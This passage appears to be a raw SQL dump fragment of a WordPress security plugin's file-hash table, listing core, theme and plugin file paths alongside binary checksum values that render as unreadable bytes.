���','���!�Fױ����(���#��1��:�','',0,'?'),('&c�YD�#�P{+��','wp-includes/js/jquery/ui/effect-blind.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȷ��� ��m�7','Q�X�_m�\\>��h�!Ƶ�^M���!V^&','',0,'?'),('A`�k{�n���/*ScN','wp-includes/js/dist/vendor/react-dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�JeN���uL��','��\"mO�=����E¹jas�lIJ�������','',0,'?'),('D�8)�|�)_e����','wp-content/themes/newsmagbd/inc/post_hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���e[�y��}3��\rs�','���!�$�C�F�|��_��P�7a@#','',0,'?'),('P�h�ui8V��\0kU�','wp-includes/blocks/post-date/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	B\r�L��F�J\\�','ؼ����Q��!L_+�q{�{į��6�l�~a��','',0,'?'),('yI�U���0����','wp-content/themes/newsmagbd/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n1w�=����h�','UP��I��{l��ù�\\�2svT����','',0,'?'),('~�Fӡ�q���TMB�','wp-content/plugins/wp-cerber/assets/flags/ls.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�?\0��rɝ��E?�','�t?B��\0��{��!����e��Wh�ٲv��','',0,'?'),('�����Y����q�','wp-includes/customize/class-wp-customize-partial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J@�N-p<�1]\Z�n�','ƪ�㫾������s�uu��nΐ\0��V<1�r','',0,'?'),('���,H(b�_F�O','wp-admin/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�י_xL9�~h��\0','�H*+w�����Cy�	m�v�1R�2\ng�\\�','',0,'?'),('��HVե�d��p�Vp','wp-includes/images/media/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4���\0T��̇?�','����v��)�\n�6Zl��2���В1�!+	�','',0,'?'),('�5�Å�ƌ���m�','wp-includes/block-patterns/query-standard-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`b�4�š��uW�Z','λd��v�,�a���:�6�_/M�^Wr','',0,'?'),('��#�U;5L�:�','wp-content/plugins/redirection/database/database-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!iç�P�� ���ib��','$�v�B>��W�Z���3\rі���Όtx�T','',0,'?'),('�\n��UN~���\0m��','wp-includes/js/codemirror/csslint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M_ϱI����l�',']�ih4F��ò�\r��U����WEK(�P�d','',0,'?'),('�c\"ml� �Ǟ>o','wp-admin/images/wordpress-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�%�d���g���p','�\"�u�j-QE\0��[�gL�Z5�MD�:','',0,'?'),('�*х�1�-�k0��','wp-content/plugins/wp-cerber/languages/wp-cerber-es_ES.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!u���/=��','T�B>�[����Yu�\"O,�����[as\r�','',0,'?'),('$%#��_�U�_d�','wp-content/plugins/wordfence/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	��|C��w@��m�','5�ã\0ӊVb�A�Ň���.Z�;Mz�q]��','',0,'?'),('*�O�������i','wp-includes/customize/class-wp-customize-media-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U��=\r���J�$�','�_&�3��$���9����b��ږN���\Z*\n','',0,'?'),('=�NgÈ�����W;','wp-content/plugins/wp-cerber/assets/flags/ci.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v�yd���2¹��','���.�=D	��dԢ���)�*k���,8Dˬ','',0,'?'),('D�� �2��K|&�','wp-admin/css/nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h����{\"���k�R','�����+�%Dj�g�!�1�#�y�om�͆�[D','',0,'?'),('E6l�y\0�	��','wp-content/plugins/redirection/models/url/url-match.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�*�ク�����','�9�v�n�b]K��Ŋ���q� ]�\n�\\ٱ�','',0,'?'),('Q�10�����G��,','wp-includes/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x} ��pc��K�O�','(H>�0�}���8:e�)T��N�/�z�','',0,'?'),('{�M��i�i2n��6�','wp-includes/js/jquery/ui/effect-highlight.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N���x���:��cT�','D�I�4h\ng�SZ����o|�(ޱs\r8�z��','',0,'?'),('�K\Z �}�ȑ�ׄː�','wp-content/plugins/wp-cerber/assets/flags/lb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',6uƤs%��D^P��)�','��!�sl��Q��_~m�I�n��G)���.','',0,'?'),('�[�U����)$�(\r�','wp-content/plugins/wp-cerber/languages/wp-cerber-nb_NO.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|=K\"Z0�=�o��','�a�0���{�5��<������p��\"�s���','',0,'?'),('��A��Fk�','wp-admin/js/privacy-tools.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.X�c���\r��n','9=+*}��4-�o5��H���[L檰','',0,'?'),('���.Q}3��T�','wp-includes/Requests/Hooker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Pz�4ɇF*','t\r{�k�?i�k�C\nL��b�̇�Wy','',0,'?'),('�Z�u���iigԄ��','wp-includes/js/dist/nux.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)L\Z����Ӟї��','Z�^�,�}e\nΣ����d:I����ប�&','',0,'?'),('\rE�lZ}�I��8�+V','wp-content/plugins/wp-cerber/assets/rateit2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B�_��[r]s�T�j','�Uu8�X*O\'bS,���+�|tV֭�( S�','',0,'?'),('\rU�j�zh�2/�9�fM','wp-admin/js/application-passwords.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-:���28R@��I}','�S:��M���;��C\0�<�{Q���5�5�C��','',0,'?'),('\rn?���d�c�_�u7�','wp-content/themes/newsmagbd/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�^ng)C̶;��m��','Z(��~c�G�y�::6]�fX��6X|�rb��g','',0,'?'),('\rxݍ�^���\Z���<;','wp-admin/my-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�k���PƂY~�P4�','�][��`mf~\Z���d�+���b�Z��b�=q','',0,'?'),('\rz�����D�D��','wp-content/plugins/wordfence/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m�����_�','��RȆF\nD�~H�08),:llW�n�\rc��','',0,'?'),('\r����X����+�-Ta','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ �Mϼ�V_�i�	��','��U�s����D�MÙ�d��(�\0��ā�~���','',0,'?'),('\r�vN��[B��&��SL','wp-admin/css/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y���Xދ�7�i*�','p*���)�kj�\Z�\0m,�6��� �ٖؗS�;��','',0,'?'),('\r��<�:� -{��̖H','wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3°�\nᄷ�\0�a��','`	\\XO�U>8X.�f��?��m�{\nQ]�8��','',0,'?'),('\r�ҧxOz��z���h','wp-includes/class-wp-customize-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�Vj�\'WB{.��u','�f)%�|u��8Jo�A�tD4�L�+����^','',0,'?'),('\r��:�:���HH�:d','wp-admin/css/edit.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�.5��e�ޗ����`','�ojv��I�\"�|���Z����0��\n���%�{�','',0,'?'),('\r�%����%�yS�`�','wp-includes/js/crop/cropper.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����H.s�o����','�py����,B�����G��-�t�����=�s','',0,'?'),('\rѪ1s1=��`(�y','wp-admin/options-head.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cV8A#h:e׭/��^','c҈��^$kR2\r=���ܫ���@g��2�','',0,'?'),('\rҗ�r׾� ���\n�\Z','wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�@���ޯ]��&','7aP��\\T����\"S�z���J�&b�ٸ®D�','',0,'?'),('W7��{(��;:P���?','wp-admin/includes/class-bulk-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A2�?������+Y��','�i���;�M3�U�P�<�XZ��z����','',0,'?'),('X��H奥(�:�Z�','wp-admin/admin-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�Iys��j�y��Ѩ_','8=Ի�(���H��&�uE\Zl}RZ��>Ol�x','',0,'?'),('\\d���;�ѳbI%@��','wp-content/plugins/wp-cerber/assets/flags/dk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K\n�l����7D!','%���w����r6�U^�/1���6�a��\'<b�B','',0,'?'),('^��� �lkB��K�','wp-content/plugins/wp-cerber/assets/flags/vg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����C�XBJ��\'2','`���G�a\02��%̛7�\\H�=gs�%��','',0,'?'),('a5�ͅB�_��s�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EӤ㭇��M��g��','Q��*\'���B�+E��ߞ��:��m��yu�W','',0,'?'),('go�s�V�;���\n$','wp-includes/js/tinymce/plugins/compat3x/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�n���1����oVb','C���T�(��N+�,��TN�C����`ީ���','',0,'?'),('��[_�:<}�����','wp-content/plugins/wordfence/js/jquery.tools.min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:-��Eՠx�$�B',',�4�~aT�lS �fQO	f���Tӵ��;��)','',0,'?'),('�h�r\Z����;%e�-x','wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J��u;Q�Z6��','����\\MU��KhQ�w�C��i�V���J\'','',0,'?'),('� ��C�Y���','wp-includes/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�w3aAr���6VH%�2','%���(\'��Q�[����y�B��	�O4AO7','',0,'?'),('�>�M�8� ٵ��|','wp-includes/images/crystal/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S����I0An�','L��%X����O�+��Aa�!�S�\\܉�&���','',0,'?'),('͗�~��q��yL*>','wp-includes/blocks/block/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�*�\'�]e\"P��','�s&�sQ�*%�P+݁��\0�4�“���[_��','',0,'?'),('�ihOP[����f','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B�^.Q�iI�','Cc�qa\0>�I�1����?^����_7�c','',0,'?'),('�Hd�����o�CZ','wp-includes/sitemaps/class-wp-sitemaps-index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&a���1��5b}1','�kZ���`��*5Yu�…�WB�-4Y?�{̯�','',0,'?'),('��\"\rJ\04��\'i�','wp-admin/js/password-strength-meter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʃ�D����)�a�n','`��)C�E�L�d�X\\�&F-�V7�+1�SA','',0,'?'),('4�}T�k�D\'W','wp-content/plugins/wp-cerber/assets/rateit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)3U�d�/��{\ZK3E�','�,-3�\"�a��~����P�c���8�F��M','',0,'?'),('A����!�j���V��','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-pl_PL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*��	���[�,����','JڴDM��&���4*\r�GD2/W�\' bG��','',0,'?'),('\\�����AV*籿','wp-includes/js/jquery/ui/slider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J���;���:/}V�@','|��^��n&\\:+�\']�/�9T��6���(�','',0,'?'),('�c��nx�Ժ|�','wp-includes/class-walker-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��2�G�E����;H�','GJ8������Y<1Q{<�5�C���[�V��z','',0,'?'),('�U�cO���d⻧W��','wp-content/plugins/redirection/locale/redirection-it_IT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2��@�[�V#�<f��','�eDQ��F�eO�s����p����Jѣ','',0,'?'),('���u�z,(u�0','wp-content/plugins/wp-cerber/languages/wp-cerber-bs_BA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�h\r�\"�^i]9)q','E[ٔ��o����9�.��Q�L�\"�������3','',0,'?'),('�����n��Nd','wp-includes/js/hoverintent-js.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' p��.`�u76��?','Y!�:\nA��ː	��ګ�Zg�,=�|����','',0,'?'),('�]�*�.>`E��f�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�F���h�瀁1-�','6!o�m��ݎ^�.�^@˨��v7�	I�}��','',0,'?'),('�ݡ=��Nx��K�`*','wp-content/plugins/wordfence/lib/wordfenceClass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W9y\\g�e�%�9�','n\Z�?�>%��U&��L^hp!j-l��]Z*#M','',0,'?'),('�O>�Pw�^�Y��X�','wp-includes/blocks/post-template/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n���V��&�G��T�B','����գJ?�Lja��]^ޓ�	�R�V�%e.','',0,'?'),('��d��=��@hs�:k}','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#lJP��e0u�g�۔�','U�WM����slL����9#Tb�Wj?\\�u���','',0,'?'),('�rJ�<p>����Z�','wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2Q���l�~���!','�š�t�RS)�z�\\{ӑ(�Wd��9c�K�F�','',0,'?'),('�&/�db�d�q�2/','wp-admin/includes/class-wp-community-events.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b��nu�_�hY&\'V[','B{�\r_�أ���M\'��\n~6)���+��᠘','',0,'?'),('�%w45�X��泞','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��^I\'�]!�����','��Ǧ�bt�5��f�����c��kd��m','',0,'?'),('\0��]�a�v���CY','wp-includes/class-wp-walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�e؞w\\��4\"R','mM�](E��=����tR��,`\".��}�U','',0,'?'),('�?H�����h�D0	','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ﬨ�rz���d�','�h���+�][e+�h�ӆ��FY� V','',0,'?'),('���NVԱ��z�Z','wp-includes/js/jquery/ui/effect-shake.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�̎�X�!��-�U��','�.��,�e=~[�Y�p�x�\"��o�?v��#��','',0,'?'),('z\0��3h���d�*','wp-includes/blocks/post-template/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�{�� CJ�D�1F','Zk�&�\0���#����-B���=����n','',0,'?'),(')��_�J�����','wp-includes/js/media-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���$��hJ\0Ȭ�\\h','�����;�8m[�K���1L3���u�1q~','',0,'?'),('=�[:���\r&�F��E','wp-includes/blocks/video/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w��g�K��? �D��','X��c���� �ﬢkvSn�7�W�5̋a\'�','',0,'?'),('?���϶�^7:y��','wp-includes/blocks/paragraph/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���:�t�Me&�>','�ʟ�ω���P�Xw��P�\0�ޤop���l�Ҷ','',0,'?'),('Fnʹ=8�_�?�F�','wp-content/plugins/wp-cerber/assets/flags/lt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z���\0��H�b–�','�l�w��L+�u�Ţ�U��J&�������','',0,'?'),('G<7e�t�/�W�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[f0L�ş��\r�{VW�','��\'&ܔ[m`�ϊ�c2E��%�W�GW�䉷','',0,'?'),('L}b&�۵�b','wp-includes/blocks/separator/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h��R��m�y�L:','D�k�L�?@Ά��\"����2�j62A�','',0,'?'),('`�&��锥~K3/d','wp-admin/css/login.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N9CԮ�w=A^Ց��','ʞ<}�� �i�S�zN�f+s�՗���','',0,'?'),('�\'ѯ�H��o3kVX','wp-content/plugins/wp-cerber/assets/flags/to.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��Un��ze��','^�7��\r)���KFd��FG6B�����(\0_*','',0,'?'),('���ґ-���\r�{,�','wp-content/plugins/wordfence/lib/wfCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7 ƿ����s�y��','|�uIP�wh5ڎ.m\"*n_�� 9����J�P�','',0,'?'),('�~��L��*�,�<:�','wp-admin/includes/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y������Ę �','�O� �n�uO\nd�7K[\"}��7\'p���`��`','',0,'?'),('�Sx��4�@o�w�N','wp-admin/js/widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�[��jB4L!��','0�Ri�J���,P�X�y	�	*Ri����!','',0,'?'),('�ڤ& �M�KQ�o?','wp-admin/images/freedom-2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:Dw����8���','H���_�Y:\"8������0o�_6\\&�ZYY','',0,'?'),('���:m��[ݢ�:#','wp-includes/l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(��C�h���#','�Ǹ�9�1Y�����5$�?,=�M�2.��r�','',0,'?'),('�I��\\j���x���g','wp-admin/images/date-button-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','‹?���a�0��9JQ\Z�','���*�Q����_(G:*��ηd������.','',0,'?'),('�]P�JQƀ6o֢��;','wp-includes/Requests/Exception/HTTP/428.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�����<�^G��\"0c!','C�O�W%���tߏ�Y�|��&�0�VŒ�\\�','',0,'?'),('���;��i�0��J~�','wp-includes/blocks/columns/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')���,�b�P�L(|','���ce]�s�����S��a�\\�Y�u:��','',0,'?'),('���j7r[�,��Z��','wp-admin/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����M�HwX�f3��Ҟ','�ķT�,#R-D�v#���8t�[\Z��?�v_��','',0,'?'),('4��B�\07qoB�o6�','wp-includes/blocks/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z<!�U�n��_�eQB','Pn�2���&�Y!�>P�ٙ�{�q61����p','',0,'?'),('�z�y,��e\"��!��','wp-content/plugins/wordfence/css/wordfenceBox.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���WY�~�H�#�]','�r����{��\ZI�5�O1���Q��Ӈ���C��','',0,'?'),('\Z��lm��@��','wp-includes/customize/class-wp-customize-date-time-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��ch�L��F�3�b','�!V���#|��:�{Ǎ.a����(�[y�O%','',0,'?'),('�-��\'g���P�\\�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�V�#ҹ���4�','Gp�f��Hv����\Z��x�8����1C�[�4A','',0,'?'),('D�8hFޛBViR�','wp-admin/css/colors/blue/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g���za��}O)�pa�','��YRU!�<�sx=i�ſ\Z�	�XCI���vY','',0,'?'),('L,\Z\"�\0C�ʡ8y�','wp-includes/js/dist/primitives.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��߈pA��Nm��STR','��`i�>��^<��7}\Z���!��`!ts��','',0,'?'),('j׻���q.�*;��2','wp-admin/css/colors/sunrise/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z/-6���r9��/�ZF','#�>��w{��H�C���c/X�җ��.','',0,'?'),('w�es��i<�O�J%�','wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hȗk{#�u��$cPo3','�����\'�j��L(��j���Q�L]6l����','',0,'?'),('��>�`P���@��߹','wp-includes/theme-i18n.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;�`�q�p�\\\'h','��f8����\'u��+�W+l����~KԸ$.','',0,'?'),('�Ը��%\ZD�y�Z','wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	���E��W����','�t��P�?Cutx`w`�MO��yQ��.J�G��','',0,'?'),('�Z��d*��Y��ژ�','wp-content/plugins/wordfence/views/options/block-all-options-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5bcjc�Tc�sq�̣]','W:.@�H9�K�B5\\�a�t	얗�ʪg�/','',0,'?'),('�ӎA}ҎWZ5=*t�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b;v\'�g��~����k','m�!�M��J\"v�>,���0�\0՜ɫ� &jِ�','',0,'?'),('�r�W�3���᥾V','wp-admin/css/color-picker-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�p�ES���c�V','�<�=\0�[Z\n2|닢��\0?6������������','',0,'?'),(':�X��2�M��~��','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�4vLhN�!��2|','���3iA(���p���GD��ڔ����','',0,'?'),('C�y��8�\'a���','wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0mj���Ԟ�W','�͛=��ېI�hK�g\0��%T.��]��\r��~','',0,'?'),('L���8��\\�ݼ+','wp-admin/images/imgedit-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��\'��6U�������t','�?�؎)�.l�����%�<�(�_� 6�`^c7','',0,'?'),('m�ñ�~���R�?','wp-content/plugins/wordfence/views/tools/options-group-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o���\n2���0���\0','aG�ִ\nOk�&1���`3�*��ҿf���_W�','',0,'?'),('p۞�2N<:Z�7�r�','wp-includes/js/tw-sack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������9>���','{�n]�\0ֈ��n�\r����<�w˷X)���:','',0,'?'),('tRg_x\Z�K�j\nm�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-ko_KR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!X�ԟ��b3m��g�I','�B�4�h��o�/�i�y��rw\0r\\k�� ��׳','',0,'?'),('u�)8FG9�C�(���','wp-includes/js/wp-ajax-response.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�V-[���+�r\0��','�lzS}�@�)�����o����V[�޸��c�','',0,'?'),('��c�O�@�/�lM�','wp-includes/blocks/separator/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nS���Cg%�\nn��','��ች�^wx%8�a���!\'�b�m:�n#\r��','',0,'?'),('�)�:�F�:!�','wp-content/plugins/wp-cerber/languages/wp-cerber-sv_SE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t71���ۅBL�f��','#�}/��u$�z:��z�����l�4�0Ր','',0,'?'),('����9�~\0{@���','wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','®���uM�����','�JE�z����ٙ6������)P��)��\0��','',0,'?'),('�u�t�� ��ɪ��','wp-content/plugins/wp-cerber/assets/flags/es.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݵ�*M,M\'A@��K�','�򐈄c`M�Cu��6�ם)X�%|G�W��ִ�>','',0,'?'),('���Clo�������','wp-admin/nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/���j�C\"(�p���','NK�-Z�p#@���׸��Pg~�+�	N�4','',0,'?'),('���[s&i�u)�n','wp-includes/blocks/video/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','人�ejqpu�Kq','�3��6�=����[��E3�����M��,�-','',0,'?'),('�&�	Y�tz(�\Z��','wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j.\\�0*���	[����','f���8��\'!�RF���L���˙^�w��','',0,'?'),('��I<���U�CMdZ�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\nA�I�g��+��.','5�N叜p�o\'�GYNsC�IS��>LJ�','',0,'?'),('��-��i>bs��1�','wp-includes/js/jquery/ui/resizable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c0�N^�l�����L��','�~��i�{Q���ԯ��֕���YdF�w\r,�Ϲ','',0,'?'),('\'Y���֖�>v�ǡ','wp-content/plugins/wp-cerber/assets/flags/td.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��б�n�HБ�����','��rJ���VO>\Z~dƨn`ik\Z����\\','',0,'?'),('9�L�/gJ�)3','wp-content/plugins/wp-cerber/assets/flags/bt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�@^؟J�H;��2:','	��\'��A-��êu��rdƹ��Q����','',0,'?'),('^V�RD<;�� ��3T','wp-content/plugins/wp-cerber/languages/wp-cerber-zh_TW.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��]�s�?\0�cy���(','b�w�r7��Ňg{ZW����\Zا9���','',0,'?'),('c�� ȵ�E9jz[�','wp-includes/blocks/code/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�����̕{C��c��','����5�$�%\n/����t��\'W&�����','',0,'?'),('w�7�v+�q1�\Z���','wp-includes/blocks/list/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:{���LF7�B{\rt','��y��υH���PM��7�����1��F�m!','',0,'?'),('��4r�%����j���','wp-includes/SimplePie/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�~Hwb�x��xsٷ:�','0���sD���;��P�=�\'��2�	��\0Df��','',0,'?'),('��KS+�e׎A�@��','wp-admin/css/colors/light/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��Y�Hn	T��5^�','��Y�y�7B۩���/�c�಻�$r��&���Z','',0,'?'),('�����Fe�	